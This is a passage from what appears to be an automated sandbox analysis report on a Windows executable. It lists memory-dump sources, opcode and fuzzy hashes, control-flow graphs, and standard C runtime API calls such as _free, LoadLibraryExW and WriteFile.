                                                                        • Opcode Fuzzy Hash: ca4aec982a2a4b2d2f33e14bca3c9d57d466865a64e6e5f3ae2d359e413b357d
                                                                        • Instruction Fuzzy Hash: E6A01130B00202CBAB008E38AA8820C3ABCAA0A2A230A002AAA00C0000EA208080AA00
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2350707484.00000000005E2000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2350668072.00000000005E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2350785047.0000000000666000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5ba1380cb9152e7cdc994e456a920f27018b5a696dcda6c5b24acc876655b729
                                                                        • Instruction ID: 9820790c21417e2d62dd67bb3f712248c4bd2c42390f60fb291fa3791d0fe75e
                                                                        • Opcode Fuzzy Hash: 5ba1380cb9152e7cdc994e456a920f27018b5a696dcda6c5b24acc876655b729
                                                                        • Instruction Fuzzy Hash: 07B10972E086918FEB11CA7CC8943997FA25B97220F1D82D5D9A59B3DAC135480AC7A1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2350707484.00000000005E2000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2350668072.00000000005E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2350785047.0000000000666000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3c440fd392f191b6e8895623acec7e7899405cf54a5bc7bded58fbc5a49b1d70
                                                                        • Instruction ID: 72a1f79e74caebefc62bd8a40c4a9c3973a4f42a40d359900aa8e0b35eafee29
                                                                        • Opcode Fuzzy Hash: 3c440fd392f191b6e8895623acec7e7899405cf54a5bc7bded58fbc5a49b1d70
                                                                        • Instruction Fuzzy Hash: CA912E72A086614FC725CD28C85039ABAE2ABD5324F1DC27DE8A99B3D2D674DC46D3C1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2350707484.00000000005E2000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2350668072.00000000005E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2350785047.0000000000666000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ea3c089c40a90612af5fa77227c880fd5697afeefe9195d09533c97548e9e871
                                                                        • Instruction ID: 8252d623cb90423c21b5d6be48fff897a217f5ae9128c33bbcfa51bc726b4ea7
                                                                        • Opcode Fuzzy Hash: ea3c089c40a90612af5fa77227c880fd5697afeefe9195d09533c97548e9e871
                                                                        • Instruction Fuzzy Hash: 3A814F37A08DA14BCB188E7CAC512F97B935F97330F2D83A9D8719B3D5C2658C069762
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2350707484.00000000005E2000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2350668072.00000000005E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2350785047.0000000000666000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c5a65835262f39d49afecb2dcdbc79a73b42f7af50d8c3cc9d06bfaccb0e10de
                                                                        • Instruction ID: bc576a371fec7143c57f8428747861dbcab2dc36129228f38725c30463b42f22
                                                                        • Opcode Fuzzy Hash: c5a65835262f39d49afecb2dcdbc79a73b42f7af50d8c3cc9d06bfaccb0e10de
                                                                        • Instruction Fuzzy Hash: 31712737B15DB147871C8D3C5C122E9AB939BD233072ED37A9DB5DB3E0CA298D024680
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2350707484.00000000005E2000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2350668072.00000000005E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2350785047.0000000000666000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 914d959bc7e6c9efb39b9576444eff4f150a526f5f3cca680094477f89f3e344
                                                                        • Instruction ID: 9c7a29d8279a4fff94db5d3fcd4b92b86f87c5d360c11adfd172cb00c3496833
                                                                        • Opcode Fuzzy Hash: 914d959bc7e6c9efb39b9576444eff4f150a526f5f3cca680094477f89f3e344
                                                                        • Instruction Fuzzy Hash: 4F513836A083608BD7219F289C4066BB7E3EBD6724F29C67CD8956B351E731DD0287C5
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2350707484.00000000005E2000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2350668072.00000000005E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2350785047.0000000000666000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 630998247854d0bde64274e99dbb902cb22c51f1debc744137b24f1c1796da0b
                                                                        • Instruction ID: f63cf5a0b0a0f9cf20584a694c9274c1131093004377bbb59ceda94832e3bc01
                                                                        • Opcode Fuzzy Hash: 630998247854d0bde64274e99dbb902cb22c51f1debc744137b24f1c1796da0b
                                                                        • Instruction Fuzzy Hash: 96511337A199D19FD7254E3C4C022E96A531BE7370B3E43AADCB09B3D1CA668D434390
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2353664787.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true
                                                                        • Associated: 00000000.00000002.2353646177.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353692046.000000006CDA1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353713696.000000006CDA7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353769292.000000006CDF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6cd90000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7e1bbf0c01800f87f18f9aa7c653b174653a5627e0dd4fdf758ae893ca71f130
                                                                        • Instruction ID: bfa4ef7f8d033f6323489f659cc3e8bf24359274f9f82dba731f17451fb45470
                                                                        • Opcode Fuzzy Hash: 7e1bbf0c01800f87f18f9aa7c653b174653a5627e0dd4fdf758ae893ca71f130
                                                                        • Instruction Fuzzy Hash: 50510076F102058FCF04CFBCC9916DEBBF2AB4A324F144219E929E77A4C73999058B15
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2353664787.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true
                                                                        • Associated: 00000000.00000002.2353646177.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353692046.000000006CDA1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353713696.000000006CDA7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353769292.000000006CDF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6cd90000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8d52fb2acaea47cc711755e886856fc2c512988177476dc3ebe6c672e5574d84
                                                                        • Instruction ID: c18f100c84ef3e70b37ffd2c1680ffa43ffa7057396a3614913fd13cd2d6dbab
                                                                        • Opcode Fuzzy Hash: 8d52fb2acaea47cc711755e886856fc2c512988177476dc3ebe6c672e5574d84
                                                                        • Instruction Fuzzy Hash: 45E08632912128EBC710CBC8C5409CAB3ECE745A45F110496F505D3520C270DE00C7D0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2350707484.00000000005E2000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2350668072.00000000005E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2350785047.0000000000666000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e37c34810d76ac32ed1e3c693d6fe2006ff27c0c8d8d7da8e10277fe1322ecdb
                                                                        • Instruction ID: 34fde4c13fcfd63171c7d53dbec0e996951c7845071132db72e9b575714ea7da
                                                                        • Opcode Fuzzy Hash: e37c34810d76ac32ed1e3c693d6fe2006ff27c0c8d8d7da8e10277fe1322ecdb
                                                                        • Instruction Fuzzy Hash: 90B01254B142087F0064AE0E8C45D7BF7FED2CB650F107018B408A3314C650EC0482FD

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 928 6cd9c6f8-6cd9c70c 929 6cd9c77a-6cd9c782 928->929 930 6cd9c70e-6cd9c713 928->930 931 6cd9c7c9-6cd9c7e1 call 6cd9c869 929->931 932 6cd9c784-6cd9c787 929->932 930->929 933 6cd9c715-6cd9c71a 930->933 941 6cd9c7e4-6cd9c7eb 931->941 932->931 934 6cd9c789-6cd9c7c6 call 6cd9a013 * 4 932->934 933->929 936 6cd9c71c-6cd9c71f 933->936 934->931 936->929 939 6cd9c721-6cd9c729 936->939 942 6cd9c72b-6cd9c72e 939->942 943 6cd9c743-6cd9c74b 939->943 947 6cd9c80a-6cd9c80e 941->947 948 6cd9c7ed-6cd9c7f1 941->948 942->943 949 6cd9c730-6cd9c742 call 6cd9a013 call 6cd9e627 942->949 945 6cd9c74d-6cd9c750 943->945 946 6cd9c765-6cd9c779 call 6cd9a013 * 2 943->946 945->946 954 6cd9c752-6cd9c764 call 6cd9a013 call 6cd9e725 945->954 946->929 955 6cd9c810-6cd9c815 947->955 956 6cd9c826-6cd9c832 947->956 950 6cd9c7f3-6cd9c7f6 948->950 951 6cd9c807 948->951 949->943 950->951 958 6cd9c7f8-6cd9c806 call 6cd9a013 * 2 950->958 951->947 954->946 962 6cd9c823 955->962 963 6cd9c817-6cd9c81a 955->963 956->941 965 6cd9c834-6cd9c83f call 6cd9a013 956->965 958->951 962->956 963->962 971 6cd9c81c-6cd9c822 call 6cd9a013 963->971 971->962
                                                                        APIs
                                                                        • ___free_lconv_mon.LIBCMT ref: 6CD9C73C
                                                                          • Part of subcall function 6CD9E627: _free.LIBCMT ref: 6CD9E644
                                                                          • Part of subcall function 6CD9E627: _free.LIBCMT ref: 6CD9E656
                                                                          • Part of subcall function 6CD9E627: _free.LIBCMT ref: 6CD9E668
                                                                          • Part of subcall function 6CD9E627: _free.LIBCMT ref: 6CD9E67A
                                                                          • Part of subcall function 6CD9E627: _free.LIBCMT ref: 6CD9E68C
                                                                          • Part of subcall function 6CD9E627: _free.LIBCMT ref: 6CD9E69E
                                                                          • Part of subcall function 6CD9E627: _free.LIBCMT ref: 6CD9E6B0
                                                                          • Part of subcall function 6CD9E627: _free.LIBCMT ref: 6CD9E6C2
                                                                          • Part of subcall function 6CD9E627: _free.LIBCMT ref: 6CD9E6D4
                                                                          • Part of subcall function 6CD9E627: _free.LIBCMT ref: 6CD9E6E6
                                                                          • Part of subcall function 6CD9E627: _free.LIBCMT ref: 6CD9E6F8
                                                                          • Part of subcall function 6CD9E627: _free.LIBCMT ref: 6CD9E70A
                                                                          • Part of subcall function 6CD9E627: _free.LIBCMT ref: 6CD9E71C
                                                                        • _free.LIBCMT ref: 6CD9C731
                                                                          • Part of subcall function 6CD9A013: HeapFree.KERNEL32(00000000,00000000,?,6CD9924C), ref: 6CD9A029
                                                                          • Part of subcall function 6CD9A013: GetLastError.KERNEL32(?,?,6CD9924C), ref: 6CD9A03B
                                                                        • _free.LIBCMT ref: 6CD9C753
                                                                        • _free.LIBCMT ref: 6CD9C768
                                                                        • _free.LIBCMT ref: 6CD9C773
                                                                        • _free.LIBCMT ref: 6CD9C795
                                                                        • _free.LIBCMT ref: 6CD9C7A8
                                                                        • _free.LIBCMT ref: 6CD9C7B6
                                                                        • _free.LIBCMT ref: 6CD9C7C1
                                                                        • _free.LIBCMT ref: 6CD9C7F9
                                                                        • _free.LIBCMT ref: 6CD9C800
                                                                        • _free.LIBCMT ref: 6CD9C81D
                                                                        • _free.LIBCMT ref: 6CD9C835
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2353664787.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true
                                                                        • Associated: 00000000.00000002.2353646177.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353692046.000000006CDA1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353713696.000000006CDA7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353769292.000000006CDF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6cd90000_file.jbxd
                                                                        Similarity
                                                                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                        • String ID:
                                                                        • API String ID: 161543041-0
                                                                        • Opcode ID: b19d64e817f1f92d8885cc9d67c743be971c621272890a1c77e64e1c7893f405
                                                                        • Instruction ID: ae45764f92bf788ac055a1f6609593acc3c22ee4657512fa5ebb2d0f660549b8
                                                                        • Opcode Fuzzy Hash: b19d64e817f1f92d8885cc9d67c743be971c621272890a1c77e64e1c7893f405
                                                                        • Instruction Fuzzy Hash: 8631823AA04301DFE760AB35D844BC6B3E8EF44358F214529E06DD7AB4DF70EA449B61

                                                                        Control-flow Graph

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2353664787.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true
                                                                        • Associated: 00000000.00000002.2353646177.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353692046.000000006CDA1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353713696.000000006CDA7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353769292.000000006CDF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6cd90000_file.jbxd
                                                                        Similarity
                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                        • String ID:
                                                                        • API String ID: 776569668-0
                                                                        • Opcode ID: 41e71d546974486af599f63b9b52efa044ba31a0c15146488be47c050284ca50
                                                                        • Instruction ID: c6fb252a1a7ab5135c0390d95f507f430779e751d1a37ae2becf2c335fa10551
                                                                        • Opcode Fuzzy Hash: 41e71d546974486af599f63b9b52efa044ba31a0c15146488be47c050284ca50
                                                                        • Instruction Fuzzy Hash: A3219A7AD04108AFCB51DF94C880DDD7BB9BF08244F014166F51D9B634DB71DA48DB91

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1012 6cd97eb0-6cd97f01 call 6cda0b40 call 6cd97e70 call 6cd982f7 1019 6cd97f5d-6cd97f60 1012->1019 1020 6cd97f03-6cd97f15 1012->1020 1021 6cd97f80-6cd97f89 1019->1021 1022 6cd97f62-6cd97f6f call 6cd982e0 1019->1022 1020->1021 1023 6cd97f17-6cd97f2e 1020->1023 1027 6cd97f74-6cd97f7d call 6cd97e70 1022->1027 1025 6cd97f30-6cd97f3e call 6cd98280 1023->1025 1026 6cd97f44 1023->1026 1034 6cd97f40 1025->1034 1035 6cd97f54-6cd97f5b 1025->1035 1029 6cd97f47-6cd97f4c 1026->1029 1027->1021 1029->1023 1032 6cd97f4e-6cd97f50 1029->1032 1032->1021 1036 6cd97f52 1032->1036 1037 6cd97f8a-6cd97f93 1034->1037 1038 6cd97f42 1034->1038 1035->1027 1036->1027 1039 6cd97fcd-6cd97fdd call 6cd982c0 1037->1039 1040 6cd97f95-6cd97f9c 1037->1040 1038->1029 1045 6cd97fdf-6cd97fee call 6cd982e0 1039->1045 1046 6cd97ff1-6cd9800d call 6cd97e70 call 6cd982a0 1039->1046 1040->1039 1042 6cd97f9e-6cd97fad call 6cda09e0 1040->1042 1050 6cd97fca 1042->1050 1051 6cd97faf-6cd97fc7 1042->1051 1045->1046 1050->1039 1051->1050
                                                                        APIs
                                                                        • _ValidateLocalCookies.LIBCMT ref: 6CD97EE7
                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 6CD97EEF
                                                                        • _ValidateLocalCookies.LIBCMT ref: 6CD97F78
                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 6CD97FA3
                                                                        • _ValidateLocalCookies.LIBCMT ref: 6CD97FF8
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2353664787.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true
                                                                        • Associated: 00000000.00000002.2353646177.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353692046.000000006CDA1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353713696.000000006CDA7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353769292.000000006CDF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6cd90000_file.jbxd
                                                                        Similarity
                                                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                        • String ID: csm
                                                                        • API String ID: 1170836740-1018135373
                                                                        • Opcode ID: 9ffbde42296f5c2e848508862d22d11d02c581744c99bb32ecc054f236cd1345
                                                                        • Instruction ID: 6ffc3f548361857d12cbec9a6b8648419c24855c492afa743d76e51cbc90551f
                                                                        • Opcode Fuzzy Hash: 9ffbde42296f5c2e848508862d22d11d02c581744c99bb32ecc054f236cd1345
                                                                        • Instruction Fuzzy Hash: 7C41A538A01205EFCF00DF69C880ADEBBF5BF45318F158195E819ABB61D731DA15CBA1

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1058 6cd9b53a-6cd9b546 1059 6cd9b5ed-6cd9b5f0 1058->1059 1060 6cd9b54b-6cd9b55c 1059->1060 1061 6cd9b5f6 1059->1061 1062 6cd9b569-6cd9b582 LoadLibraryExW 1060->1062 1063 6cd9b55e-6cd9b561 1060->1063 1064 6cd9b5f8-6cd9b5fc 1061->1064 1067 6cd9b5d4-6cd9b5dd 1062->1067 1068 6cd9b584-6cd9b58d GetLastError 1062->1068 1065 6cd9b5ea 1063->1065 1066 6cd9b567 1063->1066 1065->1059 1070 6cd9b5e6-6cd9b5e8 1066->1070 1069 6cd9b5df-6cd9b5e0 FreeLibrary 1067->1069 1067->1070 1071 6cd9b58f-6cd9b5a1 call 6cd99673 1068->1071 1072 6cd9b5c4 1068->1072 1069->1070 1070->1065 1074 6cd9b5fd-6cd9b5ff 1070->1074 1071->1072 1078 6cd9b5a3-6cd9b5b5 call 6cd99673 1071->1078 1073 6cd9b5c6-6cd9b5c8 1072->1073 1073->1067 1076 6cd9b5ca-6cd9b5d2 1073->1076 1074->1064 1076->1065 1078->1072 1081 6cd9b5b7-6cd9b5c2 LoadLibraryExW 1078->1081 1081->1073
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2353664787.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true
                                                                        • Associated: 00000000.00000002.2353646177.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353692046.000000006CDA1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353713696.000000006CDA7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353769292.000000006CDF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6cd90000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: api-ms-$ext-ms-
                                                                        • API String ID: 0-537541572
                                                                        • Opcode ID: a43848fdfd37e9ce92c8bcc600ff096ac3d1e8cd8594ee4d62e4ff5bca0f9e4b
                                                                        • Instruction ID: 9d774ccc00201759b45ad1a372698ee24dd10d282b88311813c33eba17ff83e2
                                                                        • Opcode Fuzzy Hash: a43848fdfd37e9ce92c8bcc600ff096ac3d1e8cd8594ee4d62e4ff5bca0f9e4b
                                                                        • Instruction Fuzzy Hash: BC210A79A05221FBEB719B66DC44B5E77689F427A8F230614ED15E7AE0D630DD00C6E0
                                                                        APIs
                                                                          • Part of subcall function 6CD9E78E: _free.LIBCMT ref: 6CD9E7B3
                                                                        • _free.LIBCMT ref: 6CD9E814
                                                                          • Part of subcall function 6CD9A013: HeapFree.KERNEL32(00000000,00000000,?,6CD9924C), ref: 6CD9A029
                                                                          • Part of subcall function 6CD9A013: GetLastError.KERNEL32(?,?,6CD9924C), ref: 6CD9A03B
                                                                        • _free.LIBCMT ref: 6CD9E81F
                                                                        • _free.LIBCMT ref: 6CD9E82A
                                                                        • _free.LIBCMT ref: 6CD9E87E
                                                                        • _free.LIBCMT ref: 6CD9E889
                                                                        • _free.LIBCMT ref: 6CD9E894
                                                                        • _free.LIBCMT ref: 6CD9E89F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2353664787.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true
                                                                        • Associated: 00000000.00000002.2353646177.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353692046.000000006CDA1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353713696.000000006CDA7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353769292.000000006CDF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6cd90000_file.jbxd
                                                                        Similarity
                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                        • String ID:
                                                                        • API String ID: 776569668-0
                                                                        • Opcode ID: df3a62bae5619c0391a4dd73f1ed9280de25fa8ef6cc31c29413405a70c15383
                                                                        • Instruction ID: 572a85e11e53aeaa1779578a448c3d1ad7b543a7f27a73484832d02c2c08a1b0
                                                                        • Opcode Fuzzy Hash: df3a62bae5619c0391a4dd73f1ed9280de25fa8ef6cc31c29413405a70c15383
                                                                        • Instruction Fuzzy Hash: 1F118E36940B08AAD730BBB0CC85FCB779CAF04749F400815A29DA6EB5DB35B50897A2
                                                                        APIs
                                                                        • GetConsoleOutputCP.KERNEL32(?,00000001,?), ref: 6CD9D927
                                                                        • __fassign.LIBCMT ref: 6CD9DB0C
                                                                        • __fassign.LIBCMT ref: 6CD9DB29
                                                                        • WriteFile.KERNEL32(?,6CD9C0C3,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CD9DB71
                                                                        • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6CD9DBB1
                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CD9DC59
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2353664787.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true
                                                                        • Associated: 00000000.00000002.2353646177.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353692046.000000006CDA1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353713696.000000006CDA7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353769292.000000006CDF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6cd90000_file.jbxd
                                                                        Similarity
                                                                        • API ID: FileWrite__fassign$ConsoleErrorLastOutput
                                                                        • String ID:
                                                                        • API String ID: 1735259414-0
                                                                        • Opcode ID: b10a18c8f8af104c5f8be61c512340be4eae99a348d88bda58fd03a6b60e24eb
                                                                        • Instruction ID: 982cb5ad27573ca6678faf22c19f84bf5647db9114ef39c11dab1e7c22b69308
                                                                        • Opcode Fuzzy Hash: b10a18c8f8af104c5f8be61c512340be4eae99a348d88bda58fd03a6b60e24eb
                                                                        • Instruction Fuzzy Hash: E6C1BD79D042589FDB01CFA8C9809EDFBB5BF09308F28416AE865FB751D7319946CB60
                                                                        APIs
                                                                        • GetLastError.KERNEL32(00000001,?,6CD98055,6CD97180,6CD96B99,?,6CD96DD1,?,00000001,?,?,00000001,?,6CDA6120,0000000C,6CD96ECA), ref: 6CD98395
                                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6CD983A3
                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6CD983BC
                                                                        • SetLastError.KERNEL32(00000000,6CD96DD1,?,00000001,?,?,00000001,?,6CDA6120,0000000C,6CD96ECA,?,00000001,?), ref: 6CD9840E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2353664787.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true
                                                                        • Associated: 00000000.00000002.2353646177.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353692046.000000006CDA1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353713696.000000006CDA7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353769292.000000006CDF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6cd90000_file.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLastValue___vcrt_
                                                                        • String ID:
                                                                        • API String ID: 3852720340-0
                                                                        • Opcode ID: 9fe094788177b8e59421e6760e46dd896342a5fa9355be039864b5392f8f14d4
                                                                        • Instruction ID: f4fe107e993c04eadaaadf33a34ae7ac77f3c3093f6f60c804e0e448b2810b9c
                                                                        • Opcode Fuzzy Hash: 9fe094788177b8e59421e6760e46dd896342a5fa9355be039864b5392f8f14d4
                                                                        • Instruction Fuzzy Hash: 0B01B93A34D3219EB7001B75FC449873778EB06B79B25032FEA20855F0DF1284055154
                                                                        Strings
                                                                        • C:\Users\user\Desktop\file.exe, xrefs: 6CD9A884
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2353664787.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true
                                                                        • Associated: 00000000.00000002.2353646177.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353692046.000000006CDA1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353713696.000000006CDA7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353769292.000000006CDF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6cd90000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: C:\Users\user\Desktop\file.exe
                                                                        • API String ID: 0-1957095476
                                                                        • Opcode ID: ee4201043f7e33e92d798f264ab67d0b0c4382dac7319eae871dba05561988c3
                                                                        • Instruction ID: ee5699815387403bd0a8eb1c39b7b4edfcf4afae8eb6b0792ea767fe5ae30f55
